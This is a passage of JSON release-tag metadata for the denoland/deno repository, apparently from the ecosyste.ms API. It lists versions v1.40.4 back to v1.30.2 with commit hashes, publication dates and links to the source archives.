214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"com